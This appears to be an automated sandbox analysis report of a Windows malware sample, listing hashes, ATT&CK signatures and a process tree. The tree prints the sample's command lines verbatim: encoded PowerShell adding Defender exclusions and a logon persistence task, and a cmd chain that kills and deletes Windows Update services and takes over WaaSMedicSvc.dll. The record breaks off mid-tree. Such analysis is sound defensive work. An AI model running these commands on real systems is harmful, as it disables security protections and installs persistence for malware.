06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130

Analysis

max time kernel
299s
max time network
299s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
25-08-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
Size

4.3MB
MD5

4f0dcfb8b8cf69bb60c7c051554f0fc5
SHA1

992f2bf6e63b6894c6f5311efa2cf908e50621d1
SHA256

06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130
SHA512

936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c
SSDEEP

98304:L56u2b1q7yXmonPI9d80h0zlLKc7ol9qSrQDrmPTj1CWDcWt4RdKFnb71:16N1+ImonA9d80hSKNmS8Drmn9dSCFnt

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Drops file in Drivers directory 2 IoCs

Processes:

06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 2 IoCs

Processes:

updater.execonhost.exe

pid process

4836 updater.exe
5068 conhost.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

5024 takeown.exe
4600 icacls.exe
4312 takeown.exe
4596 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

5024 takeown.exe
4600 icacls.exe
4312 takeown.exe
4596 icacls.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

updater.exe

description pid process target process

PID 4836 set thread context of 5068 4836 updater.exe conhost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1216 sc.exe
2784 sc.exe
2024 sc.exe
4392 sc.exe
4564 sc.exe
4604 sc.exe
5084 sc.exe
3924 sc.exe
4972 sc.exe
1908 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4836	updater.exe
5068	conhost.exe

pid	process
5024	takeown.exe
4600	icacls.exe
4312	takeown.exe
4596	icacls.exe

pid	process
5024	takeown.exe
4600	icacls.exe
4312	takeown.exe
4596	icacls.exe

description	pid	process	target process
PID 4836 set thread context of 5068	4836	updater.exe	conhost.exe

pid	process
1216	sc.exe
2784	sc.exe
2024	sc.exe
4392	sc.exe
4564	sc.exe
4604	sc.exe
5084	sc.exe
3924	sc.exe
4972	sc.exe
1908	sc.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4468	reg.exe
2684	reg.exe
4648	reg.exe
4812	reg.exe
4732	reg.exe
2320	reg.exe
1900	reg.exe
4476	reg.exe
960	reg.exe
3800	reg.exe
4544	reg.exe
3972	reg.exe
4428	reg.exe
4140	reg.exe
4636	reg.exe
2292	reg.exe
4604	reg.exe
4540	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exepowershell.exepowershell.execonhost.exe

pid	process
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
3272	powershell.exe
3272	powershell.exe
3272	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe
5068	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

632

pid	process
632

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeIncreaseQuotaPrivilege	2000	powershell.exe
Token: SeSecurityPrivilege	2000	powershell.exe
Token: SeTakeOwnershipPrivilege	2000	powershell.exe
Token: SeLoadDriverPrivilege	2000	powershell.exe
Token: SeSystemProfilePrivilege	2000	powershell.exe
Token: SeSystemtimePrivilege	2000	powershell.exe
Token: SeProfSingleProcessPrivilege	2000	powershell.exe
Token: SeIncBasePriorityPrivilege	2000	powershell.exe
Token: SeCreatePagefilePrivilege	2000	powershell.exe
Token: SeBackupPrivilege	2000	powershell.exe
Token: SeRestorePrivilege	2000	powershell.exe
Token: SeShutdownPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeSystemEnvironmentPrivilege	2000	powershell.exe
Token: SeRemoteShutdownPrivilege	2000	powershell.exe
Token: SeUndockPrivilege	2000	powershell.exe
Token: SeManageVolumePrivilege	2000	powershell.exe
Token: 33	2000	powershell.exe
Token: 34	2000	powershell.exe
Token: 35	2000	powershell.exe
Token: 36	2000	powershell.exe
Token: SeShutdownPrivilege	2400	powercfg.exe
Token: SeCreatePagefilePrivilege	2400	powercfg.exe
Token: SeShutdownPrivilege	3596	powercfg.exe
Token: SeCreatePagefilePrivilege	3596	powercfg.exe
Token: SeShutdownPrivilege	5056	powercfg.exe
Token: SeCreatePagefilePrivilege	5056	powercfg.exe
Token: SeShutdownPrivilege	4428	powercfg.exe
Token: SeCreatePagefilePrivilege	4428	powercfg.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeTakeOwnershipPrivilege	5024	takeown.exe
Token: SeIncreaseQuotaPrivilege	3576	powershell.exe
Token: SeSecurityPrivilege	3576	powershell.exe
Token: SeTakeOwnershipPrivilege	3576	powershell.exe
Token: SeLoadDriverPrivilege	3576	powershell.exe
Token: SeSystemProfilePrivilege	3576	powershell.exe
Token: SeSystemtimePrivilege	3576	powershell.exe
Token: SeProfSingleProcessPrivilege	3576	powershell.exe
Token: SeIncBasePriorityPrivilege	3576	powershell.exe
Token: SeCreatePagefilePrivilege	3576	powershell.exe
Token: SeBackupPrivilege	3576	powershell.exe
Token: SeRestorePrivilege	3576	powershell.exe
Token: SeShutdownPrivilege	3576	powershell.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeSystemEnvironmentPrivilege	3576	powershell.exe
Token: SeRemoteShutdownPrivilege	3576	powershell.exe
Token: SeUndockPrivilege	3576	powershell.exe
Token: SeManageVolumePrivilege	3576	powershell.exe
Token: 33	3576	powershell.exe
Token: 34	3576	powershell.exe
Token: 35	3576	powershell.exe
Token: 36	3576	powershell.exe
Token: SeIncreaseQuotaPrivilege	3576	powershell.exe
Token: SeSecurityPrivilege	3576	powershell.exe
Token: SeTakeOwnershipPrivilege	3576	powershell.exe
Token: SeLoadDriverPrivilege	3576	powershell.exe
Token: SeSystemProfilePrivilege	3576	powershell.exe
Token: SeSystemtimePrivilege	3576	powershell.exe
Token: SeProfSingleProcessPrivilege	3576	powershell.exe
Token: SeIncBasePriorityPrivilege	3576	powershell.exe
Token: SeCreatePagefilePrivilege	3576	powershell.exe
Token: SeBackupPrivilege	3576	powershell.exe
Token: SeRestorePrivilege	3576	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.execmd.execmd.execmd.execmd.exeupdater.exe

description	pid	process	target process
PID 1868 wrote to memory of 2000	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	powershell.exe
PID 1868 wrote to memory of 2000	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	powershell.exe
PID 1868 wrote to memory of 4316	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 1868 wrote to memory of 4316	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 1868 wrote to memory of 1876	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 1868 wrote to memory of 1876	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 4316 wrote to memory of 2024	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 2024	4316	cmd.exe	sc.exe
PID 1876 wrote to memory of 2400	1876	cmd.exe	powercfg.exe
PID 1876 wrote to memory of 2400	1876	cmd.exe	powercfg.exe
PID 1868 wrote to memory of 3576	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	powershell.exe
PID 1868 wrote to memory of 3576	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	powershell.exe
PID 4316 wrote to memory of 4392	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 4392	4316	cmd.exe	sc.exe
PID 1876 wrote to memory of 3596	1876	cmd.exe	powercfg.exe
PID 1876 wrote to memory of 3596	1876	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 5084	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 5084	4316	cmd.exe	sc.exe
PID 1876 wrote to memory of 5056	1876	cmd.exe	powercfg.exe
PID 1876 wrote to memory of 5056	1876	cmd.exe	powercfg.exe
PID 1876 wrote to memory of 4428	1876	cmd.exe	powercfg.exe
PID 1876 wrote to memory of 4428	1876	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 4564	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 4564	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 4604	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 4604	4316	cmd.exe	sc.exe
PID 4316 wrote to memory of 4636	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4636	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4648	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4648	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 3800	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 3800	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4540	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4540	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4544	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4544	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 5024	4316	cmd.exe	takeown.exe
PID 4316 wrote to memory of 5024	4316	cmd.exe	takeown.exe
PID 4316 wrote to memory of 4600	4316	cmd.exe	icacls.exe
PID 4316 wrote to memory of 4600	4316	cmd.exe	icacls.exe
PID 1868 wrote to memory of 2228	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 1868 wrote to memory of 2228	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 1868 wrote to memory of 5096	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 1868 wrote to memory of 5096	1868	06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe	cmd.exe
PID 2228 wrote to memory of 3920	2228	cmd.exe	schtasks.exe
PID 2228 wrote to memory of 3920	2228	cmd.exe	schtasks.exe
PID 4316 wrote to memory of 3972	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 3972	4316	cmd.exe	reg.exe
PID 5096 wrote to memory of 3868	5096	cmd.exe	choice.exe
PID 5096 wrote to memory of 3868	5096	cmd.exe	choice.exe
PID 4316 wrote to memory of 4468	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4468	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4812	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4812	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4732	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4732	4316	cmd.exe	reg.exe
PID 4316 wrote to memory of 4788	4316	cmd.exe	schtasks.exe
PID 4316 wrote to memory of 4788	4316	cmd.exe	schtasks.exe
PID 4316 wrote to memory of 4880	4316	cmd.exe	schtasks.exe
PID 4316 wrote to memory of 4880	4316	cmd.exe	schtasks.exe
PID 4836 wrote to memory of 3272	4836	updater.exe	powershell.exe
PID 4836 wrote to memory of 3272	4836	updater.exe	powershell.exe
PID 4316 wrote to memory of 3180	4316	cmd.exe	schtasks.exe
PID 4316 wrote to memory of 3180	4316	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
"C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AegBpAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AGcAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcgBzAGEAIwA+ACAAQAAoACAAPAAjAHQAZwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAB0AHIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdgBhAG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZwB0AHcAcQAjAD4A"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2024

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4392

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5084

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4564

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4604

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:4636

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:4648

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:3800

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:4540

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4544

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4600

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3972

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4468

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4812

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4732

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4788

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:4880

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:3180

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:436

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:4936

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:820

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZQBxACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABvAG4AZQBkAHIAaQB2AGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgAnACkAIAA8ACMAbAB0ACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AKQAgADwAIwB6AG4AIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBlAGYAcABlACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAGQAIwA+ADsA"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "TaskMachineQC"
2⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\schtasks.exe
schtasks /run /tn "TaskMachineQC"
3⤵
PID:3920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:5096

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:3868

C:\Users\Admin\AppData\Roaming\onedrive\updater.exe
C:\Users\Admin\AppData\Roaming\onedrive\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AegBpAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AGcAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcgBzAGEAIwA+ACAAQAAoACAAPAAjAHQAZwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAB0AHIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdgBhAG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZwB0AHcAcQAjAD4A"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:3128

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1216

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3924

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2784

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4972

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1908

C:\Windows\system32\reg.exe
